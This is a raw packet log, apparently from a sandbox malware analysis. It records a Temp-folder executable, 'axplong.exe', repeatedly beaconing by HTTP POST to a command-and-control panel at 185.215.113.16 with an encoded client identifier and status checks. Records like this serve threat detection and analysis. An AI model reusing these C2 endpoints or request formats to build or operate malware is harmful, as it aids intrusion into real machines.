Sep 27, 2024 19:05:30.302994013 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:30.535983086 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	62783	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:30.655736923 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:31.391613960 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:31.394906044 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:31.632481098 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	62784	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:31.757313967 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:32.466902018 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:32.468005896 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:32.697851896 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	62785	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:32.812783003 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:33.505606890 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:33.506508112 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:33.729070902 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	62786	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:33.843513012 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:34.536292076 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:34.537298918 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:34.759916067 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	62787	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:34.874448061 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:35.564917088 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:35.566376925 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:35.790292025 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	62788	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:35.906795979 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:36.805506945 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:36.806343079 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:37.041392088 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	62789	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:37.190538883 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:37.904227972 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:37.904932022 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:38.133568048 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	62790	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:38.253225088 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:38.944102049 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:38.944865942 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:39.169862032 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	62791	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:39.280857086 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:39.982755899 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:39.983638048 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:40.462874889 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	62792	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:40.578200102 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:41.473840952 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:41.475071907 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:41.698685884 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	62793	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:41.812711000 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:42.527532101 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:42.529194117 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:42.753321886 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	62794	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:42.874540091 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:43.610168934 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:43.610893011 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:43.850919962 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
